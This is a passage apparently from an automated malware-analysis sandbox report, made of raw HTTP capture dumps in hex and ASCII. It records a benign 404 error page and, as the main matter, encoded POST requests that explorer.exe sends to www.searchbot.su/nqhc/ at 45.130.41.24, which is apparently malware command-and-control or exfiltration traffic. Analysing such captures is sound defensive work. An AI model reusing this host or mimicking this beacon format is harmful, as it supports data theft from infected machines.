                                                                                                                                                                          Data Ascii: o3bY(x~07mdQSPReNkR1gFMHgYP-JUuvVMthBErqaM9LUisZe9K3v_ITMwp7ReH7yUzTk3M9L1ovdIrodCHgx82sxdrlKn3Op5BqofNJFvlWBwH7AqQAvao3Sn(uD8b0MfpNNy8G5vO9(MGlVsyL4GGgJiafDy6RbKuJHh8wF1ieKR9R2WeXXc5LUrvcnAWdpEBpDZKkHSYNrsJVffycIKIN3eFz0EYM53lcAt7vK9zeGhe1JoU
                                                                                                                                                                          Dec 5, 2022 15:17:42.898760080 CET12041OUTData Raw: 57 52 44 41 4d 49 38 34 50 66 55 71 45 55 4d 31 5a 34 6a 31 57 78 57 4b 78 34 50 41 74 75 48 62 67 32 67 67 4b 47 68 6e 62 59 34 53 6b 42 70 6b 76 34 63 63 43 4f 35 5f 36 6b 43 74 34 76 37 6c 47 65 32 41 47 55 41 46 63 61 65 57 6d 4f 59 6f 35 36
                                                                                                                                                                          Data Ascii: WRDAMI84PfUqEUM1Z4j1WxWKx4PAtuHbg2ggKGhnbY4SkBpkv4ccCO5_6kCt4v7lGe2AGUAFcaeWmOYo56MKdbDEGuTTPUXQaH1TccrUj0adNmqFeaT5h2gyZKLc6_BayqtWHd5r~AONSIk5D-7aPMKfQzRXyTnEzh5LuKC-2Ukr0XKlYHorGmWmXlna18aDb5ucSMQOMU0c(LaGQDj0xsH6Zl2iSfsat6aA4v6CN8OZW_8tYkx
                                                                                                                                                                          Dec 5, 2022 15:17:42.977089882 CET12053INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: openresty
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:17:42 GMT
                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                          Content-Length: 39481
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; }
                                                                                                                                                                          Dec 5, 2022 15:17:42.977190971 CET12054INData Raw: 6f 75 74 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e
                                                                                                                                                                          Data Ascii: output.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++];
                                                                                                                                                                          Dec 5, 2022 15:17:42.977263927 CET12056INData Raw: 74 61 20 2f 20 64 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: ta / damp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floo
                                                                                                                                                                          Dec 5, 2022 15:17:42.977334976 CET12057INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("puny
                                                                                                                                                                          Dec 5, 2022 15:17:42.977391005 CET12058INData Raw: 30 2c 20 6c 65 6e 20 3d 20 6f 75 74 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: 0, len = output.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.enco
                                                                                                                                                                          Dec 5, 2022 15:17:42.977444887 CET12060INData Raw: 30 3b 20 6a 20 3c 20 69 6e 70 75 74 5f 6c 65 6e 67 74 68 3b 20 2b 2b 6a 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a
                                                                                                                                                                          Data Ascii: 0; j < input_length; ++j) { ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow
                                                                                                                                                                          Dec 5, 2022 15:17:42.977514982 CET12061INData Raw: 6f 41 53 43 49 49 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 20 64 6f 6d 61 69 6e 20 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20
                                                                                                                                                                          Data Ascii: oASCII = function ( domain ) { var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za
                                                                                                                                                                          Dec 5, 2022 15:17:42.977572918 CET12062INData Raw: 65 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                                          Data Ascii: een; } .logo { padding: 30px 40px; } .content { display: flex; justify-content: space-between; margin: 0 82px; } .left { display: fl
                                                                                                                                                                          Dec 5, 2022 15:17:42.977629900 CET12064INData Raw: 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 65 61 64 65 72 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                                                                                                                          Data Ascii: : 15px; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0 100 42" fill="none" xmlns="http://www.w3.org/2
                                                                                                                                                                          Dec 5, 2022 15:17:42.977701902 CET12065INData Raw: 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 35 33 2e 31 35 30 39 20 31 34 2e 31 37 38 38 43 35 33 2e
                                                                                                                                                                          Data Ascii: 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556 12.7287 52.7556 12.47C52.455 12.211 52.0227
                                                                                                                                                                          Dec 5, 2022 15:17:43.023533106 CET12066INData Raw: 36 34 30 35 20 31 30 2e 30 34 39 34 43 36 35 2e 39 36 37 38 20 31 30 2e 30 34 39 34 20 36 35 2e 33 35 32 31 20 31 30 2e 31 37 35 37 20 36 34 2e 37 39 32 20 31 30 2e 34 32 35 37 43 36 34 2e 32 33 31 37 20 31 30 2e 36 37 37 39 20 36 33 2e 36 31 33
                                                                                                                                                                          Data Ascii: 6405 10.0494C65.9678 10.0494 65.3521 10.1757 64.792 10.4257C64.2317 10.6779 63.6136 11.0274 62.9346 11.475L63.2065 10.3343L58.7385 10.3351L58.2337 12.5144H59.3852L57.5098 20.6619H60.8287L62.5044 13.3418C62.9323 13.1149 63.3172 12.9453 63.6601


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          5192.168.11.204983945.130.41.2480C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:15:04.917323112 CET11102OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.searchbot.su
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 51815
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.searchbot.su
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.searchbot.su/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 77 35 58 63 4b 78 6a 33 4a 4d 74 72 55 4a 61 52 6c 55 4b 56 30 70 74 4f 30 50 6f 36 35 37 69 38 66 4d 30 44 33 5a 4a 38 41 57 66 6c 37 70 69 75 37 76 75 48 30 4d 41 58 33 48 50 4b 63 61 68 58 48 44 62 33 4a 30 35 2d 52 44 65 75 52 55 43 4c 72 47 31 4d 32 69 75 47 35 59 45 66 73 65 57 4f 57 4e 70 66 77 69 75 37 65 79 48 6a 57 6a 61 6d 6f 79 66 46 6c 49 4c 7a 4f 61 30 4d 78 31 65 51 34 6c 51 59 51 44 6d 5a 67 71 31 67 77 38 7a 4c 53 6e 46 34 59 45 4e 4d 55 77 73 47 7e 76 42 42 56 50 77 5a 46 75 38 77 50 57 32 6b 59 72 50 53 6a 55 31 44 4f 54 61 44 51 6c 4e 65 59 49 76 58 4c 61 62 30 45 37 41 47 75 7a 65 38 59 48 33 36 43 43 6f 5f 56 48 6f 4b 6f 72 6d 30 6c 57 31 4b 59 4a 43 38 6a 50 79 37 51 30 30 4c 65 47 6a 37 6e 69 59 47 39 55 35 36 71 79 36 5a 50 6d 4f 46 48 54 35 48 61 43 59 6f 57 4c 44 44 45 42 4c 6e 44 58 5a 47 78 31 43 65 50 71 32 67 62 6a 48 44 54 4f 49 44 56 44 6a 63 6c 62 7a 45 38 6b 35 63 34 33 42 65 4a 71 61 66 4a 4d 69 71 62 41 4e 77 54 36 57 59 66 6a 41 45 4f 71 78 7a 6f 37 28 6c 6f 34 7a 6c 73 4e 59 31 6c 4b 77 57 77 5a 52 61 34 4f 72 65 74 6e 31 70 70 69 6b 31 48 2d 32 6b 6a 6d 78 69 6e 72 5a 4b 48 72 6c 7a 37 5a 6c 6e 4a 79 68 45 74 74 6c 75 39 36 47 54 44 31 39 6a 68 61 64 49 5a 64 37 70 6b 46 38 5f 7a 46 28 57 4b 65 69 5f 38 35 54 6e 61 34 4a 55 55 68 42 35 39 4b 35 47 50 31 4b 36 4d 31 55 37 7e 59 33 35 53 39 4b 76 6a 75 65 31 6c 46 47 72 45 46 49 45 67 6d 6a 67 63 71 38 79 71 4b 57 63 69 4a 70 76 55 75 44 51 4a 42 7a 61 78 6b 6f 6a 4e 79 46 52 6b 50 41 44 57 76 41 4c 4f 42 45 44 74 6f 44 65 4c 62 43 67 53 6c 71 6c 6b 4e 6f 37 67 44 57 43 70 49 77 36 49 51 6b 7a 68 75 43 61 33 5a 4b 6f 6c 68 4b 41 30 62 36 67 65 70 77 78 39 75 38 31 6a 4e 46 4c 6e 69 41 6c 39 47 57 52 4e 49 6b 4a 76 53 57 37 61 5f 43 52 48 58 79 65 79 55 42 66 38 5a 46 6f 54 67 70 4d 49 79 6f 76 50 4f 63 42 64 32 4f 42 6c 6b 4a 55 77 4a 66 70 59 59 49 6b 52 62 74 4a 53 7a 56 49 41 72 5a 4e 59 58 79 37 49 66 4c 71 32 42 36 66 48 41 59 41 37 70 56 6d 30 36 46 47 7a 79 55 41 75 58 34 4e 7e 35 63 61 30 49 4c 34 49 73 7a 4d 56 38 46 43 61 57 66 56 28 54 51 51 6d 58 6f 41 74 61 49 75 31 4f 44 4a 34 57 30 5f 6c 59 57 51 49 52 6d 69 4a 32 68 34 70 45 38 66 65 47 66 6d 4c 76 36 49 78 64 38 63 4a 71 74 4b 4e 73 6f 38 49 75 6f 66 6b 77 68 4e 4b 6c 7a 4d 32 58 6a 32 48 57 43 58 48 57 36 4d 64 75 6d 75 71 30 4b 64 7a 4f 70 43 73 37 45 4d 68 75 74 6f 61 57 68 57 70 4e 4e 35 62 47 70 71 7e 42 4d 56 52 35 4e 47 69 52 45 48 65 35 71 6f 6e 38 7e 59 55 67 53 50 61 62 37 47 4a 4a 34 61 67 47 64 66 78 75 6a 68 59 59 37 59 4a 78 52 38 46 35 42 72 5a 53 46 79 76 77 68 55 6a 6d 7a 6a 43 71 28 4a 30 65 57 67 4b 6c 71 69 58 46 41 74 69 79 28 75 78 63 31 31 4a 72 33 6e 54 61 75 61 68 58 74 53 62 30 4c 52 51 4b 4c 78 43 39 6f 37 28 59 6e 78 58 6f 74 64 52 38 71 33 62 63 67 62 72 42 6b 77 66 4e 79 59 56 6a 52 73 35 63 4f 55 50 59 75 58 46 58 7e 6d 57 41 6b 4a 6f 55 44 4f 61 68 38 4e 46 54 71 56 6b 45 5a 6f 73 5f 61 74 41 54 63 61 74 67 43 55 7e 30 51 37 55 51 55 4e 4e 35 6a 42 46 56 39 43 51 58 4d 6d 64 44 67 71 4d 37 59 32 43 53 6c 7a 49 73 42 62 36 61 54 79 4f 53 33 69 47 51 4c 71 6e 4b 63 4b 4a 51 73 45 4b 4f 4d 78 71 70 41 71 52 4b 45 77 30 77 77 79 39 65 64 74 4d 56 39 37 6e 51 30 52 53 41 43 7a 38 69 55 47 57 4d 36 67 58 79 32 4c 4c 69 66 69 51 70 61 6a 51 4c 37 5a 34 2d 6c 59 44 4a 37 31 63 79 45 68 5a 66 73 31 78 59 37 53 58 46 64 30 70 43 75 39 48 62 28 63 70 5f 65 42 53 57 47 68 55 63 6b 79 7e 6f 34 44 72 42 37 5a 73 64 50 36 67 38 6d 67 78 45 55 7a 79 57 4a 72 5a 56 79 77 6f 79 43 65 71 6b 6b 54 6b 4c 49 36 74 70 76 73 72 62 49 55 44 6f 4d 52 34 7a 69 6d 4b 58 37 33 54 78 73 5a 31 67 53 76 68 41 39 67 57 39 66 33 61 37 41 66 56 69 30 71 4b 54 70 39 39 56 4c 59 42 61 28 79 38 45 33 79 44 74 6d 39 6c 4f 49 56 71 77 6a 7a 73 79 32 4e 6d 58 55 4f 35 32 7a 58 6d 37 6f 6c 58 78 61 79 37 63 7e 34 42 76 32 6b 74 63 7e 75 6c 6d 54 30 55 33 30 77 72 66 38 31 59 50 37 64 53 4e 46 48 63 38 78 33 69 36 6f 56 33 4e 5a 31 63 63 51 54 52 44 62 53 78 52 61 59 38 33 79 42 71 76 7a 75 72 63 74 6f 6b 33 6c 77 47
                                                                                                                                                                          Data Ascii: 7nWHV=9jZPDiqEJGn1w5XcKxj3JMtrUJaRlUKV0ptO0Po657i8fM0D3ZJ8AWfl7piu7vuH0MAX3HPKcahXHDb3J05-RDeuRUCLrG1M2iuG5YEfseWOWNpfwiu7eyHjWjamoyfFlILzOa0Mx1eQ4lQYQDmZgq1gw8zLSnF4YENMUwsG~vBBVPwZFu8wPW2kYrPSjU1DOTaDQlNeYIvXLab0E7AGuze8YH36CCo_VHoKorm0lW1KYJC8jPy7Q00LeGj7niYG9U56qy6ZPmOFHT5HaCYoWLDDEBLnDXZGx1CePq2gbjHDTOIDVDjclbzE8k5c43BeJqafJMiqbANwT6WYfjAEOqxzo7(lo4zlsNY1lKwWwZRa4Oretn1ppik1H-2kjmxinrZKHrlz7ZlnJyhEttlu96GTD19jhadIZd7pkF8_zF(WKei_85Tna4JUUhB59K5GP1K6M1U7~Y35S9Kvjue1lFGrEFIEgmjgcq8yqKWciJpvUuDQJBzaxkojNyFRkPADWvALOBEDtoDeLbCgSlqlkNo7gDWCpIw6IQkzhuCa3ZKolhKA0b6gepwx9u81jNFLniAl9GWRNIkJvSW7a_CRHXyeyUBf8ZFoTgpMIyovPOcBd2OBlkJUwJfpYYIkRbtJSzVIArZNYXy7IfLq2B6fHAYA7pVm06FGzyUAuX4N~5ca0IL4IszMV8FCaWfV(TQQmXoAtaIu1ODJ4W0_lYWQIRmiJ2h4pE8feGfmLv6Ixd8cJqtKNso8IuofkwhNKlzM2Xj2HWCXHW6Mdumuq0KdzOpCs7EMhutoaWhWpNN5bGpq~BMVR5NGiREHe5qon8~YUgSPab7GJJ4agGdfxujhYY7YJxR8F5BrZSFyvwhUjmzjCq(J0eWgKlqiXFAtiy(uxc11Jr3nTauahXtSb0LRQKLxC9o7(YnxXotdR8q3bcgbrBkwfNyYVjRs5cOUPYuXFX~mWAkJoUDOah8NFTqVkEZos_atATcatgCU~0Q7UQUNN5jBFV9CQXMmdDgqM7Y2CSlzIsBb6aTyOS3iGQLqnKcKJQsEKOMxqpAqRKEw0wwy9edtMV97nQ0RSACz8iUGWM6gXy2LLifiQpajQL7Z4-lYDJ71cyEhZfs1xY7SXFd0pCu9Hb(cp_eBSWGhUcky~o4DrB7ZsdP6g8mgxEUzyWJrZVywoyCeqkkTkLI6tpvsrbIUDoMR4zimKX73TxsZ1gSvhA9gW9f3a7AfVi0qKTp99VLYBa(y8E3yDtm9lOIVqwjzsy2NmXUO52zXm7olXxay7c~4Bv2ktc~ulmT0U30wrf81YP7dSNFHc8x3i6oV3NZ1ccQTRDbSxRaY83yBqvzurctok3lwG95fKmTPm6DlTA9LnSZrgriTgP2KdFcrFQXuceHTeHS-RAgAHBrrGY9b0oHbRmQeX_Eh(WAxo5wPV9QZibJLnSQsFjojJFt_bONv4HkFB4kV9KPyW0ITa7bSxtEC2x0lI3EXOC2-rQTWP9(j6XD4~wBwrvU8GuoqeuSi2dPQYb2vTSSPPrV082ZbpwvITyNygd9J9HBzOYAGi3MIGYnb2AsifutJmAOjgMq7yqnL0SBjZqVf36LsR03xY5es2TfAwthAj0AVggu-(AmAi9yUaOJNeQCOMIIEVbBTZNxekXKJ2mnNkZsdWKxxtIKT5OC2vdWMnfL_nuXVrOkznN8xtJxB7LLmg7HHlt4znkFAne5bKVMD9pR9KlkwQ-kZSQ8BUn(wIZ2vQQb89rJzb6yiv7AjAFXUrbtIBCbqpI4dsAXfhLEfgRgTMCu2YbOzHEjfA0wPgbs0Zv6bJBteoKw3G5Q3~yoXoG23yKZT~S4OtP8XgO8RGBgLkNoKcDRl57~kxOzaYoy0xJIPBpx89m99WiPvZ18zIrEdw4CkVtKe9DIvTp~fIdQ0W6954mbgDsvpdcslqtFoTa~L1fPD7Sba7F37U_m9ad6xMTRe0iGpXhHMeQMB4XVb7-(G5iczTpDiv1d3Wd3GZf(UoJO5Z8RKu-YkRs4xhLkqPqpfM3(czjMR~62v~45UYTLXu1Jha_O9Nv1nDWarY80G3CquqyT3(SFjS2in4aCqvdlGHCQ57fRm6UkXSWFRCdqPfHdXs1CTBeQEfd2n50KyxuuA(JfXMKAy80KAzjxxUunJitoMhv3KVx2kKCNSfqnX2wVGVErDRmW9S-aylu1Vj0hK3RsBYF8lka74hynj5v4FH2u_lAreR6yObugIjdoA28X5zA5ORUPW1wtm1EmNTn(ReZxuj9K2lG~xUyeEh5SaXDK-kGvGFNGuCuTDJTrz~XbePmtpRDpO(YzugoKRIjXjHQp0Z2i3EjMOzQ65Yf0Lm6CUq1m8olCqXSYec2u07O~1BECVJfmik2L57BmfgFY5QYJqWx1GNPr4f72MeKXZ0_iPjIXq117cuZKZsdKox66GjaX9aGYB11P4OWcyTgWY0aYgY4N-mR0MfHGin9pR9ZA3B-N_cybDIY8cIYUXaeJ-249iZxVDcmDfIFL4dJ3Mu4xkWtFTvOryZhAmKyAK~ktk1KRK8mOnti2YMBCwDvkw1tCSGQrNRA7VQtWL4GLmXuL8WNkiXrWfKfHRpkZpf5O8TmPt6QySzGt_j893HxJn2pwdfgpyyvULWwowYbumw27oMhNf2XNCbQOlhfMRqKPkg0MudKaTG_YVpw(1282LkjeCuOmWPK8mrN5vkqP7fv8IQwZ1MXDrdAn81LmRy8UOHyX0Gcn0CAezTA~b6HXqjBCwAPPhIsZOf6Ys8y4enx1H3lsLFq2mkKqf1rckZ-EnFkGh0w9XrBhDtEQ9cy3CjxuzilrSnhycfGJ2TgykUA2Op4vPPSiwS1bL5zCspZRenDHwrzvoel6VXBKsuVHXdN6l53513SEYoOn4NayUO3rqbQFyu8aNvGbq(_uj3pdcX311EwUpJF1toNdJ8oGDiQU2Q-Mo~QG-yZAt7neHevUyUcGmd_d8IucR~7GtjlG8bZDJbwer1ZY47-lHsTg_zwefBhy39nBifNXKM3jaV3XYfMnIT8TlKZI1w4Z53LtrBf8lP9tEsBPOGsDV6h(2BF5jmigkqD45UKElN0VlzXz7eVFRt_9wT1wSD3jqgLAPr2IlI8YiyNC6XIyNXEwnHCplFYrv9rMWOSTnmRXPZbfR1cE0Oq5lYxteMowlPn3XF7c7Y7849OjkZCCw9DZHqGmTD1h8SdCJX4OjM0Ee3CXEP1f54OEKtfKswr8mwcAWRHXI(oTFKnp8ru~MVrteQvg8~mLCTE49dD7jxcTkdMSEnbNgw7S4ZJ5LJJNkH-7JgKiz6Sc4x7UZkFUuQk7a8sl6fjcliR~W13SXGt07B59PnGdr6SIrJZ5qGfavCAAjdfts8aCjpJMy1CA777Kq4gZYAzwcy-39FII1Jf9ZEF6-HwBXcGQHwIldO3HtV4GuIkInn1Vac7(k3N3CqBNvDxS3HTAOH5M93lkzoqSkpLQfEsdWkXufo70qCiEbbP5RLpEjmQTwgvVimcFooysXVzjJ6woJg9TNbS3uWCj31FfTQnLORE(lrYcEDHOjyh6pd53UM5Ko9LvcRLAJIzOi3bHrLMVggpRrdzDz07UwvTUGkf1s3U82cJzOk9ntgdxo6rtakQKhiL9clNF3F1qT1no23Ehhorx7HK4tpzlnRm4QPZmnmFHfANjqEqlMTCBVhTDz(HlKHZpYHWsjEDxlG2TFjLf1aMF_I4ohZVhy3r53par7qra3UDS4NWHgD7(f~MWL7WqqE5PZwQYGGFsRzPTxldga4SaSbeZrlwXtnKBMIgzaEshfp1tkaTyVYIDPdWqCDp8zAiVfw-8ms4i-NjYaCmGSH7fV5a9_JUqHKDVakjpXmrFei_MtP10c0Uo0I-RB3SEtQNzMvF8UvE06GBVMA0EQ6OzCmkyPtJaCFvYQ2nuaERI9UHjy955cIY4UFtMCgFxZ2s9XTsCBPYXam677GfE9yHobJLgD5WiVqkzpWqs0fxpQOwulTgHC(64lbmcFu2bn9NOOHsO4JsAo7EnLDV68fqRy~qjq1EwrBRbk1Vp_l5wFBrYMzx9Z
                                                                                                                                                                          Dec 5, 2022 15:15:04.976377964 CET11105OUTData Raw: 7e 53 6a 56 67 33 68 36 42 46 65 50 55 5f 32 70 43 44 4a 61 43 70 62 56 33 4c 42 70 4f 69 6b 4e 74 79 67 6e 35 37 51 69 37 67 74 31 55 61 67 43 52 49 71 6a 48 4b 4f 6b 4e 73 34 2d 4e 6c 49 51 51 36 6b 4e 6b 38 47 7a 64 5a 33 51 64 43 55 73 34 57
